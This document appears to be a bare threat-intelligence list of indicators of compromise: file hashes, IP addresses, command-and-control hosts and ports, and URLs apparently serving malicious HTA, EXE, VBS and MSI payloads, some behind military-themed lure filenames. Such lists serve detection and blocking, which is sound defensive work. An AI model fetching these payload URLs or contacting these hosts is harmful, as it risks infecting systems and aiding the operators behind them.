0256bc29d8edfb94257bb15bed55f5f15782669f5ec5f769ae60e9dfe5ce41cd
b36443057aae33ade1d3a48560ffb70faa597e8cd81d3d0c7017baa59533f0e2
aa00299f52e9ed2521a1a67bf1e6544ff487995d37c1a96b593ddbf17895d5c5
05ecc97361f221bb72cb0a2ce81d86e35e71d48f3f7414791a5deb3fdcdeb54e
4d50c882cac3b291776580717013ff2c23e440627c11f03277c57bdc2bee7413
575dad22318098a878414af36a8301f9f00905161279b086fe2de71165c67d3d
b1bf687bcf269dfc1b55d620bf4a8303daece5699efee864c4aae69568cb34df
b9c1a95277ba29da9d21f315ef8131f3c931940d2773ff2d96d8b133bffbab49
bd0cd4d3829bf118c2a5b5aa8fbdd7958bc29f1619ceffb5a2d812d8eb8a361e
59597ec253a7eaaebaac7b43d367a7733d1a0788bb8038f08dff37984e99ea32
07d9ac25687f656a63a34450f99d2acb5dbc6a26c4b16d345c2a84e90fc74e31
f11ce4ab3b92e20d460a3e1e8d5eeb865e77ab6a02b3fd55274ebabe024242e9
c33493847022de5ef821116c2d655673270233b788584403403e4da33afe8c60
6b9b89534534ec07c07cc529db6b898e8269cd777fd33f71b8fd726fcbae810e
bad5291477abb19820880327ae5da5f4c3db259489f10344f50961c8b4f55768
cd0bc455ad9d3d590e1305029b1fd3cd986202608cba6279c7898075a6fa93ec
d13a15c096a44fcd41ab005a2dc6dcbb0e66f7273177b56bcf19601e4c209db6
2611431961f939c9f902ce5acf79049b2d57cf2be02290cfd4e9572a16bd9a59
288f0b94a68d36328ce888cc9d79fe0647d158b1abf05fea4498f5dfd998cf4e
740f9e6c9c8b705b45d0c039ef0f44a624efa3cc90b3b77b2db9bc523c62b208
ccc45c678a6f5185428bd39ad6d2dc9759e553dc1043c94fa8f9375575661eeb
ef609ae7ef5d32d18bdecac1ed59fcce6ce766e27fe0b9e3a8f208b8e2d0c8ba
274a2d924d1522182717de20cb7d8da4a2576bb1383ea75ffbda6de51f544407
69d6e2fa7cee4f4f8f01f65076994d88c61060181be2528f0805d6e60f9c162e
84930549a3c9846c91f56b8ca2f659091af767db6bda15dffb7cc0cbfdec838c
96bf5df3d7ea29f4d2b689a245750d955b294d5d3cf122d8dc87becf973d7a34
6971674c8510c812ef6a432182e57eb08979163888a4080d016d5441b4dc28e7
a2fac0bf9f6d0b745a9befd868cf9ca76ed2e18faa890645a2b136f79b3b31cf
4004720112dc8674cd74df274175cf87476ca2e57075a29ea4745a8debd30aac
22d7a504d97fc537a5b7b9147bbcfa2f3b36694fa527ad8dc4d0686e73666dbd
9bd74243aee04e952cd0fcaf5018d11040e105c13992f5b9a403a72abdfb8e24
65c660552dd2b8a37db09db9bc1bab6896faeb5f1d1ae957d78f0b726040e229
c879e3a6c2551c4a81cc535564d55a450dc8172ca8f8c83bb63207f5965a5ea4
f8c25e5193dd9e2b95294bc6bfce155470d9c768fb34729c438a42c8aa3ae804
000fb3799a741d80156c512c792ce09b9c4fbd8db108d63f3fdb0194c122e2a1
6539445b4f4a4a40e0e167d251fd860be86deb7e9e8c448dece531ababa4ffe2
cc18715cb037185a7373de7ff6ae9ecbf16be33492c3042e62d74c25fe355e0e
1e87f5a1cf8e2ac506e1ae033dec18481922006e2108e0c58c41e80440f66aa9
06d8fecfe490deccbbd8be08c8b6cd698b7780cbddc834e2f6d7166de593e178
dfb66fb210ae7a4f0beaedc74cea53072c082687fce9f2ac1de9cb9c04c6514a
4345756cb32cc708d128a93b6ab3dcd798ed142bef2e2ee34d4f31dd736479d6
30fb6eba4b45dbe3d0152a3acdfa0ef75f0359da93f42ab271e53c3529e986cf
69fa53c561b1a2222f98934cf3d62dfbb1f73746377eeee9d9483651f2bb1792
aeab890831897ba6eb42ed208d5105fc091c57ed50101952072ff3a6b261c807
09024cba380dec7cf6efb2e7618707d7a06124f67a318330e0ec1256036d337a
6a4b9112f07b29b16c0595a80501d0ef6beaa33f3a94469c8a18ec492c3435c9
92f798fde2f625d82ed3979f187794e612509fc155134c4b480e4a01a994e176
a745f74930f731d9b6c302b3cd6ff6dd32e91f7972d64a637cb80cf70903136b
35c42b80924ee3d759949d8e3ae0c10ce7d81a0af62a3d8aa21fbdb5b9a6088f
b3adc8a0056a4e205e726250b28a1d86665f7668d6cb731306d92de5ba5ed4d7
dbddb135f4e968bef79bb8b44b96a4f836a9445fa88109ed1f815d87586032f8
e93a79b0e10f59ee89f01f6ad827716234f61f37252cb8a86ad19a1d2a50d7e8
51ddd9ff9415c9c4c32e6e66ea7f4e04c4719d1ffb06ddfd3f8783a814649947
6b5da0160f8671b31e670c3edb510efd52f87d25ce11c33ebe83e0958eda15da
6f9ecbfcd92004c3cf46da37bd9780e6436ae6284714edf5b79f68742a193b8b
03d97ac98243b0c540096e1d7a051282a628d4dd52e4549b84745e7a0edde1f1
31d09e5ee6f26929ea2536540f46d7029da161c05eac64696ff7e2012c767651
365c7d25fdfdca7fc1b8ce716088bf4a7a3abadc26bb6fb37718cfcc71a91943
8275e09bbf0319910ca6959f0103b4ffcb8ac272cc0f453502a4f08e4fb081fe
f3fb246e22973c86effe482dca610b9371c56304c50acfe09bb4773b1d360505
b670a54368b9653d05d56d13272ecc0eb3307380a76e4cd4a6e527b01ea15aee
f91e4762a62ad71fce898545e7d473b6ac775467891ddca5bd9bec22da23d80c
53093d049e00e699f3280ec5af937d24c3bf0d1f57c33950fd6ac6d65cf8ccc8
dbde0ddeb49e9a8600e8728dcded741a39446099144bbc14ec13926e98e19b92
ce88f14ba30ea395dfdeb1c8bebed3ad167e024c1b001f57d8b8540000463e9b
fb369dec42ba00766a7101558ad1f3fd425171da5c7fdd348bed0d739fb0f1ad
ccde2fdf3f4cc63491b5506074b865b5f2a3674f8e07e1de47512ee0f4c27b16
3405d96828961101c846478f467eddef4b1e68a63f3ff5d8da94c4727246ada6
3b1f1a65c0d80cfe4c4fab345f881236570456f482c18c53ef9307d1f4acf348
0e97cc533aae179df2a7861efced8f61526b076eaace4d2cd8fa4481f92a5a50
e88a561ff38ee6b190d7240933aab916dfff6493a4541d6913b2d22456b71864
4d44e6442084731d6cda87db9be8f956c0e7ef123280b3f189c0f2598b8a303d
2877feb0d1926393593fc0cb2d06e3260d0c99167f65f66a89a0ab4340d790a3
52e65857ed34be25c76b54d1c3131abe
6cfff5e65cabf8090ab9aa8b9977f4a8
aae4afd45b38168259268169855562b9
87a0281ced86d15b6a8fc8cf299fd96f
7164008af682b5f3567d50700b4a1b8b
7c05cfed156f152139a6b1f0d48b5cc1
b1f8484ee01a7730938210ea6e851888
0b3c248f579a8f5865972218e63c3b34
f5ee6aa31c950dfe55972e50e02201d3
56154fedaa70a3e58b7262b7c344d30a
7f87d36c989a11edf0de9af392891d89
5c734bb1e41fab9c7b2dabd06e27bc7b
0e4f60ad19a3ed01cb68a9df24c0eef4
34d817cbc38256ebf8bd8cefe92a060e
e3213e545d5169a30fa3e809ced0ab96
10a54d8a77530ef910e36b5df50bd8e1
e262dc9c87d6ae1063f402a9a10da4ee
af3044b499611683626805da55e3cdc5
81048decf4476da7b2c0145433e0757a
fa998db4becc688ff36f827e1f3c941b
1278f00a2ce547241d3cad9f05b8228a
f412b0ba82b500448e7a52f5d4cf5541
876c77e91c119ccb922eec8155a3d113
31f626793ee177f6029e2269f1ec8b16
aa92b76c20602e8becf16548d1c127b9
a5cb89f4d786bbcfa701489bc2b9c6fc
415673c482768861b7d1dcbfaff74010
2d3e86cf067d9222f154728b81c1dc40
a208dff8d416608a7f92614b07cb00ed
190650dc79a9139f4987b9f6b774e717
6fe3a7c0809e4870c9714522a0682593
1c3e1e0319dc6aa24166d5e2aaaec675
8b1cb0535e866141384f596dccc7b727
c61505a7089e2aaff8e7fc3011c51a64
d618823d9395e32fdb4f6c8ab1c33a7f
cf58b87b8bc5e4c5dad5c94e468e1dfa
1239dc3cddb5556f59c280ea36542e7a
7f5d66666298f35932a3eeb3a127fb1a
932f7f41cb8fa9fc3a6fe652d4319618
895c4252655b97ae8088b596b911cf91
630e9c4728f909924e7dc05a08490594
fd763db6b8253349411116b75e63a636
734731fb57c9124655772e6f7ee580ac
c5a3a487f4e8d5a43ed6e2ac43125174
18687ba07a3d3d84a2acc40f27e0f950
9c74d18b149e1eed4633afcc0e957d5b
bbeef0aec579afd85ca99b1aaa8b0213
8eacdaa6c5fef8211c2bd06a00832943
f4ec8404cb5f2adadb3f5e326508f917
516e8d28f4ac35f70a2c027a8819f806
02d6f9cf01db716c4a87b0e37f088bc8
7ea755d78d25fb11cc82b4422b366ee6
9b777d69b018701ec5ad19ae3f06553f
9a526c3bc92f935e8edc16232dd02fbe
5f7979d3a9ac2c056b9995b8aec65716
662bebc24a2356be351dcd687189989b
141d321230003e9a70a1fb260ba5ea6f
b4563583f5273dab58c7a02106e055a8
45b286d8d5ffac39f0689e9e4737cc29
f7c53d13f2c1b4c93d3d73f40c6b049b
f02fc94a611876d53d633151d6397c80
5a684950c42831bc605873555c6bfc91
76b9fa946f88564d2d8a001afa63c2fe
37795c76daa64e4a586eb09fc7e780d8
3d19bc58500c6e7278e8deacf289f8fc
8eb0764bf48ab967709f85a840e87e1a
3ec6f51d798eb1119b843d17efe44f07
4cbb1236b453e0ad51da897537c03753
acea5bc83c6f106908d6106b3a0399d1
974f4171bc154a8566297309f053a601
c127b0870ac701e2716ef6abc14a8728
c8dd74ba12c55eff68081dc639c655be
cfe34859426ffec8501aad1bb92db76e
74865c6c290488bd5552aa905c02666c
3b0b73d7a39d70d37cebac658901d8d6
746a9be06c5c79e707e2f812b94803b2
4b36a82e1781ffa1936703971e2d94369e3059c8524d647613244c6f9a92690b
e4615b74d62f384d23e58bc467c615b17779e4f8084c8a0134db97a5e642027f
88f0722c907100ef09049c82032a0ac66afa153d03fb89d378ae65f6e5890a3f
ef6edacf6ee1e0dd2e53046a91ba84d10a8adda6918ca7aac6e96ead432efbbc
5fff1cd29bb6e6cfe9516b70f9f44755098392c2e2a0f4784486182c309b2c99
f650a9f1930e55e405d7121c56b90a996ab213a05b772a8f02ceb1cdbeb91165
c5452b859922b9633839e092f09f0ce4818b6085043360c90c0b0f2bfad9fca1
bd871a2ccd6d7c4f89f9f5087e60cfdcc7ab35b670cfda7ddfd6dbbab8c8560c
0bbef4f3682eb8f76c032aa0515ae122ad6f03a8bfe1303b87c6b92cd363e2bc
55ddf9f5f5b517971298686ab4ac13e85bacea43ec79191d622308b08e059d6a
25dfb146058787af6b4c12be9b2ffa6479eb64d7f167adf51bf1ed9851cf0fca
c00dd156d786bb607fe405059d628bbf0abaccc6b388031fe9b043e4c54cf264
fd9c5fe5a1729b7c796a9f53e1870742d35ab5559a8249fe73aed502ba4e14d7
ff2cfdedfb2e6ff63de97a00a23a9c1c07ac6f8529bca62bb97d871ace4f8a42
3b80e140b995ca6eef2d3f56ac2df1efd6b7f45f5e79d4cbfbaf3aed4d0e7a96
92a7a3c2b5c674d523226fa4937d25e0dd10817b4d64d5588b0282e2b73ce660
54b3fa9492289a7efa717e5fe0750084dea1b1d613cc91720f14665f2b4ad2d8
15483f5352ba0971974c3fcf3154b64bc73b290aa64d3316409eda1917f8dc9a
46867d58775f609f5926d3532db7b9b8ed383df2817b1b338fc95b4e6791f84a
2d95d3f5177df2ae075f6428568dfeaa669e79b9567a094491741cc2d12d9a24
3a8a3ad0f520c49d5ade4ddfc6cf2542f38f44b6328efff6b6953cce3cac4007
579882c876ecb93ffcc692a0bd727f0ee5e9a48baae8add8c08d3ee6e479ed2a
c4ce4e9e65c7d728ff835ad658463d05d94b1e7ee3e223aed08d6094123e1b9b
0fb31797e7f114eccd406b01be6e617a1cf6aa9526455c8767607c883b3ed79d
6b2296c4f990b8176ca9d191327d17cd22b266bdeb4d3f3d179eda54cd5b3be6
4ccfd17e919a20def00ee5dd0834ce8ccdf5a2272c4d39317117fa41004e052c
a3c054edb776b56323cd99ed67c13d88088491c4a77afac917fad72ae8b33fdd
8f157186dca8c21aeebd31a7253155728c51b239129768ee91df34dc693783f5
c36aceea79893d25a63a60a4c24ca85a868fba3a1d3b9443b0689788ed985264
7ead45504118262946767e71efb65c0301498aa0234504e44224e2aabd633a14
bd81a693ff37f9d841cebcb0e16458d45562974182f170f5b42ef277845d403c
a7792480ab1d0ad7f96d81e432bf91b2782da5b9d3e9769757fe2a3a4a3d053a
c02637be5f4ef59ba888231409e94a59c77b51e57132a27a8c27d0d382f97ffa
57954ec0b9069cd82265d6d6dfa8da87cb5c96190ae9f7074d6f7a598fc4131c
9300a9e0713c0c11a37cc4a25ccb4676a0a81281f110cda63648c0775f1a996d
91da2e363bda0f0ee453afb95cb908997c915c38b75d2ad3b4a92d8e001c462e
0cea7d2fb0500acccdc53a33887f51f63ac2af96275e7b7090f3977e31626191
a103ec088ffbff8dee99f32a62e052170219b95fcf655734f7a29332428427de
9e9028eafe847837290a41f3e3bf73f603b915d26dafa5ba7fa47938463e4b00
6df3e07090795dfeb1980f4a1627f66981d4aaaafd820306d48788974fe5e6b2
1c8d8811adfbf6c756f3c3e306a1001648d2a160c8628f1644b5aa1ea96be329
4df0fff22e4b5bf69a71136c7cc4345eef38df9d60cca69baad41049b775eff3
573b634aa65277a511d05dea9ea37fdc641d871dc4a9db54be667c02a3d733c7
d29e8a555763996a24f49b854ecd730ceb0326139d52341cdcfda8f3e21f8b8d
003b0fc1eb796be142905647254fb22c6a293b2e85169d80f749b012e3130967
c9582793f6648707cb2ad9ec9fc5c206682db4a0fb2f44a49a85833da89dd390
c2c048200b2c187f23069b7134dbe5cf0e895dbb3e5016e3ec2bb47a8bb613b6
1428a57f64744727051d1a32bf97f6e41dd8cd8714e2d5e3b4a6ed1a75c2edfe
8963e1c87200d0b900f558c1968428dc3a1f05748ddeff0150297aa33d14ff88
4fe0f0af5d2381b8d16727d2e86b345abd92b028f00aa2dc1b6236373384acdf
12af137438d239f2bafcccd2818203c373241c24c160e4d2fd66187cfb371288
0b23ad719399e1eac7ea3dada19475473c04f433ecc0ac9f9301a9b11ee877a7
e87dbe2ae62fb51d3eddc3fb828bf17e1250f390036e3a0dc2e10690e24e0ced
8801e8a50a74192e79e855c314d960b9eaccc4b314f334fbba5892c73066d5a7
4e72462e1b8b219f63c4a05526fec8c822a3fe14eafcc3640a80a5098017d898
26fe1e7ab56499bc54775c70a1b5738211406ed4ca0757615fd3ff2166a9fd0a
b437db6d05ca310fae1cd99ff808fdc63ba294a0807e732f3a3f3a8ae7fab139
059dd22f9b22b26aded731fcf3d5b7bffa03f8bae2003f41b78c2180afdf5a43
50f0e1d72eb051154e8b24d9d855aaa87f6742342866f0dd5232803cfb7ff97a
3faf6ab9f38376cd7cef0309054f5106d656f3ada777394206c0112d6a4fd08e
23e5b72500af36eb5657285cb7d0f1857e66ba713fb7983adbba6f42fa9440fa
e95225de8bea6203d47147a1e85366bb758e9d03c28c5714b40a37da7d5afed3
9baf17c633a2c53b724fc4cb8170d1dd446849044ea6443944d996eb66785c32
f3fbd9fced620be6486a0d3ec3291ffb2f22d45961f43fe5f06c9767c7abdaf7
389e14b1a248c679d992349a0161bde354d745d105510378f1a8584821d606fd
1774b0f348930ef6ddcba11f9a7399918b71472b807745dd89bb5512fee95c28
11e27bebd1343c436026800194da4880810db38088d3c2622c90ea2bc549bde2
e8f98a01f5e5cef05d3ac2053490e670162826d0cdb3129898a0278de7f8383a
707d39139a1f7857d567535176779c306f9069a04b16965768c89f9829f51928
fe128f5efc9be2d0b42653ed49937b18fca277b69d7c471cd351db37f8a8567d
06533e949c1884befa9881ba5018f564c83d86be3381f4ebee0ed1f845e2e302
ae2730ecef0030994f7024d64c2ee54d68c31a8756146159e2f7244152a8be77
194.87.31.181
194.87.31.229
45.120.177.220
46.249.49.148
46.249.58.40
funedunet.com 2023-12-06  @namesrs.com
new-tech-savvy.com    2023-11-08  @hostinger.com
(tcp)://194.87.31.181:9587
(tcp)://194.87.31.229:6438
(tcp)://46.249.49.148:3232
http://funedunet.com/azov/anketa1.hta
http://funedunet.com/azov/anketa1.pdf
http://funedunet.com/azov/anketa2.hta
http://funedunet.com/azov/anketa2.pdf
http://funedunet.com/azov/podrobici.docx
http://funedunet.com/azov/podrobici.hta
http://funedunet.com/azov/uacybershieldx.exe
http://funedunet.com/azov/zayava.docx
http://funedunet.com/azov/zayava.hta
http://funedunet.com/design/img1.hta
http://funedunet.com/design/img2.hta
http://funedunet.com/design/img3.hta
http://funedunet.com/design/img4.hta
http://funedunet.com/design/img5.hta
http://funedunet.com/design/img6.hta
http://funedunet.com/design/img7.hta
http://funedunet.com/design/img8.hta
http://new-tech-savvy.com/1.hta
http://new-tech-savvy.com/1/podrobici.docx
http://new-tech-savvy.com/1/podrobici.hta
http://new-tech-savvy.com/1/zayava.docx
http://new-tech-savvy.com/1/zayava.hta
http://new-tech-savvy.com/2.hta
http://new-tech-savvy.com/2/img1.hta
http://new-tech-savvy.com/2/img1.png
http://new-tech-savvy.com/2/img2.hta
http://new-tech-savvy.com/2/img2.png
http://new-tech-savvy.com/2/img3.hta
http://new-tech-savvy.com/2/img3.png
http://new-tech-savvy.com/2/img4.hta
http://new-tech-savvy.com/2/img4.png
http://new-tech-savvy.com/2/img5.hta
http://new-tech-savvy.com/2/img5.png
http://new-tech-savvy.com/2/img6.hta
http://new-tech-savvy.com/2/img6.png
http://new-tech-savvy.com/2/img7.hta
http://new-tech-savvy.com/2/img7.png
http://new-tech-savvy.com/2/img8.hta
http://new-tech-savvy.com/2/img8.png
http://new-tech-savvy.com/3.hta
http://new-tech-savvy.com/3/foto_pidora.docx
http://new-tech-savvy.com/3/foto_pidora.hta
http://new-tech-savvy.com/3/foto_pidora_08.12.docx
http://new-tech-savvy.com/3/foto_pidora_08.12.hta
http://new-tech-savvy.com/3/foto_pidora_127.docx
http://new-tech-savvy.com/3/foto_pidora_127.hta
http://new-tech-savvy.com/3/geolokatsii_114_dshb_safin_08.12.docx
http://new-tech-savvy.com/3/geolokatsii_114_dshb_safin_08.12.hta
http://new-tech-savvy.com/3/geolokatsii_127_dshb_ignatov_08.12.docx
http://new-tech-savvy.com/3/geolokatsii_127_dshb_ignatov_08.12.hta
http://new-tech-savvy.com/3/geolokatsii_145_dshb_shamraev_08.12.docx
http://new-tech-savvy.com/3/geolokatsii_145_dshb_shamraev_08.12.hta
http://new-tech-savvy.com/3/komandy_koduvannya_114_dshb_08.12.docx
http://new-tech-savvy.com/3/komandy_koduvannya_114_dshb_08.12.hta
http://new-tech-savvy.com/3/komandy_koduvannya_127_dshb_08.12.docx
http://new-tech-savvy.com/3/komandy_koduvannya_127_dshb_08.12.hta
http://new-tech-savvy.com/3/komandy_koduvannya_145_dhsb_08.12.docx
http://new-tech-savvy.com/3/komandy_koduvannya_145_dhsb_08.12.hta
http://new-tech-savvy.com/3/opituvannya_polonenogo_ignatov_08.12.docx
http://new-tech-savvy.com/3/opituvannya_polonenogo_ignatov_08.12.hta
http://new-tech-savvy.com/3/opituvannya_polonenogo_safin_08.12.docx
http://new-tech-savvy.com/3/opituvannya_polonenogo_safin_08.12.hta
http://new-tech-savvy.com/3/opituvannya_polonenogo_shamraev_08.12.docx
http://new-tech-savvy.com/3/opituvannya_polonenogo_shamraev_08.12.hta
http://new-tech-savvy.com/3/pozivni_114_dshb_safin_08.12.docx
http://new-tech-savvy.com/3/pozivni_114_dshb_safin_08.12.hta
http://new-tech-savvy.com/3/pozivni_127_dshb_ignatov_08.12.docx
http://new-tech-savvy.com/3/pozivni_127_dshb_ignatov_08.12.hta
http://new-tech-savvy.com/3/pozivni_145_dshb_shamraev_08.12.docx
http://new-tech-savvy.com/3/pozivni_145_dshb_shamraev_08.12.hta
http://new-tech-savvy.com/4.hta
http://new-tech-savvy.com/4/drvsysx86.exe
http://new-tech-savvy.com/4/lnk.vbs
http://new-tech-savvy.com/5.hta
http://new-tech-savvy.com/6.hta
http://new-tech-savvy.com/algo.hta
http://new-tech-savvy.com/algoritm_avtobiografia.docx
http://new-tech-savvy.com/avtobiografia_shablon.pdf
http://new-tech-savvy.com/geolokatsii_277_dshb_kochetkov_0911.docx
http://new-tech-savvy.com/komandy_kotuvannya_277_dshb_0911.docx
http://new-tech-savvy.com/ofer.docx
http://new-tech-savvy.com/opituvannya_polonenogo_kochetkov_0911.docx
http://new-tech-savvy.com/pered.hta
http://new-tech-savvy.com/pered.jpg
http://new-tech-savvy.com/pozivni_277_dshb_kochetkov_0911.docx
http://new-tech-savvy.com/shablon.hta
http://new-tech-savvy.com/word_update.exe
http://new-tech-savvy.com/zad.hta
http://new-tech-savvy.com/zad.jpg
http://new-tech-savvy.com/zayava.docx
https://grabify.link/1hezeh
https://iplogger.com/2mueq3
https://iplogger.com/2z74p4
https://iplogger.com/2zrjs4
https://iplogger.com/2zujs4
11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771
cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55
e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92
fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e
764c53ea8ab98e4720ec55876c1b656d38e5e225c3835ffba491f64fa6b24b00
3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623
8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
444338339260d884070de53554543785acc3c9772e92c5af1dff96e60e67c195
47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27
f1c7045badec0b9771da4a0f067eac99587d235d1ede35190080cd051d923da
159.65.130.146
wipresolutions.com
*.dns.artstrailreviews.com	
http://23.26.137.225:8084/msappdata.msi
http://23.26.137.225:8091/chromeset.exe
input-beats.gl.at.ply.gg
scamkiller.duckdns.org
81.68.214.122
81.68.197.3
82.156.146.62
106.52.127.12
47.88.49.239
20.205.116.139
111.92.242.47
103.255.177.55
45.141.68.25
110.45.1.53
nishabii.xyz	
hfs.t1linux.com	
auto.c3pool.org
808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
b1c19e717494b33fa269b5adaf7e591d46f1ab4c1f571f22df254055349ec22c
4e4b120f5ae23a2d3a32e9dc09cc1b9ead3e8cd947555f83f84a369a4feff081
08caa2415f19565aa1fac40ea4a9e3e2eb9c6e382507e3e93677c506e4b42f9c
b87346b930120e2be9394177c530843187f7d5393738b7a935583f19cc6937b5
42590da283f271cb55efcea7c89866d6dc3358933996166302237f040141fa12
b4135ca942f8ab7e98259dd4666d9e84ba0c6a4a7326bab4b4abab5b009551be
7fb22f3b6632ab0df493b2e80a66b6a08a3173ccf5f8cdf2fc4956afd63bff23
6a43077384c2f348908dee0b5a5bbe119f82092cef87586af0b3eefe6d9d05c8
4839d344d0251f9122c11222021511702ae8dfd3185c2e300cd21c0c7a574d5f
7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b
ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d
139.84.237.229:2967
85.239.243.155:5000
104.129.55.104:2223
37.60.242.85:9785	
95.179.191.137:5938
65.20.66.218:5938	
158.220.80.157:9785
104.129.55.103:2224
158.220.80.167:2967
entrevientos.com.
gloverstech.com
035f83018cf96f5e1f6817ccd39fc0b6
b4910e998cf58da452f8151b71c868cb
4f3afdcfff8f7994b7d3d3fbaa6858b4
a15ebd19cac42b0297858018da62b1be
c440bd814be37fac669567131c4ba996
75838e5d481da40db2e235a6d5a222ef
905c2158fadfe31850766f010e149a0f
8457f71c6a5fe83bb513d1dfba99271a
35743db3dc333245ef5b69100721ced9
7d631e5b0c78805dd5d440cce788d25b
0a35e06f53c17ab1c8e18e7e0c0821d8
97db3f7676380f0baa3840ed5d5c1767
d9f00f71efabdfcca7c63d4b0805673c
43.156.118.72:443
b.niupilao.vip:80
update.kworker.net:443
check.snapupdate.org:80
42.51.40.184:56
13.214.222.35:443
cloud.awsxtd.com:443
43.140.251.218:8080
101.42.139.110:8443
101.42.139.110:53
81.68.143.132:1234
81.68.143.132:8080
bo.appleupcheck.com:443
194.36.191.75:443
1.117.165.141:53
23.100.88.61:53
6306b20b4b3fc089a7fd0e0b15ea52da879da95463d247d4f0a698207eda2718
998c18cef6f79bab58b78b390a518c3a7c8e48da37b0953e72cbe04c1287d85d
bc0697f074bcd9d26eb3fc65b1d305661c9c9d32ef0afe83fac4083d04fe38b4
e1b3bdde52fdec917aaa79f8fb1e01186447def36594339bac316a13d84ee667
2fa270cf83b341bc469b0d4430d2b5c3e95109b4b47f4f99c9e878aeaff8ec33
b7afa2662f99edcda4be8539fcc6149176f3cb241a724932cadda4088ca695ea
8a3bb648ecdffe4e6b0dcdd988c3f28eeb5dcb9e60e84fc4b7f5db947d77ebb8
32dda71e75546bed9c3032a139fb1ef8d1b05e35f26bccb568cebbae76db7f01
5a99e609bb4d3085ce0f82b23c5ce597ebf1401156d1f002a850293f8f8fac49
434517ef2e12af66ef97b740e4caf9b07a73f1321bf013b6ee6dd0d180804409
22b2d9c5d3aa575283bc0afc60df5fb8720c384bd7040ca6e4e42491b5fefcde
f32415fab8cc5ce811088b85475d0691815e6ac3ff9a65c1f6a134fa25f05b4f
2fe53a6d753eb0e288b0e514b5668ed13749227da65cd346c144c0cf8e438974
a19b88046b9ecd462037c7eef4cda1407664a1010ee0c8ef2b2fc907a129f6b7
119d6dbe182a8f4c060ae270a3606a72c7042af01de95f65936ff86774873ee7
fb6b0ff2da14b6447b21f0fc4ae73724667c8f6d296d707f18a28633b4e59ed0
e075e35f74df484366f5a1497ebeb7262c16e6dad0ed6eadd18c11b0a512c7a0
156eec85df18e7ff992a5bf35c97938557ac506c2306a8cb6633602d8a6568ed
aa880c609f5cbac2b45977359d1fd87f8292bc23e262c7a71530ae28948bdb49
59e8f42f8cd6f5bcbe5398d393314161e565adb6fb9620ddb2526798f3c34354
upserver.updateservice.store
www.cybereason.xyz
west-candy.glitch.me
853687659483d215309941dae391a68f
25005352eff725afc93214cac14f0aa8e58ca409
2edea0927601ef443fc31f9e9f8e7a77
cdce8a3e723c376fc87be4d769d37092e6591972
5fc8668f9c516c2b08f34675380e2a57
c3fd8ed68c0ad2a97d76fc4430447581414e7a7e
c79d85d0b9175cb86ce032543fe6b0d5
195e939e0ae70453c0817ebca8049e51bbd4a825
9b6c308f106e72394a89fac083de9934
27b38cf6667936c74ed758434196d2ac9d14deae
c3fe93fc9133c0bc4b441798b9bcf151
87f36a0279b31a4a2f9b1123674e3dea130f1554
yellowparallelworld.ddns.net
beginningofgraylife.ddns.net
decorous-super-blender.glitch.me
859a9e523c3308c120e82068829fab84
5bdec05bdca8176ae67054a3a7dc8c5ef0ac8deb
266305f34477b679e171375e12e6880f
607137996a8dc4d449185586ecfbe886e120e6b1
78e4975dc56e62226f4c56850efb452b
1f974d7634103536e524a41a79046785ca7ae3d6
3fbf3ce1a9b452421970810bd6b6b37a
729346dfdd2203a9943119bac03419d63554c4b8
rasaaneh-iiis.org
rasaanah-iiis.org
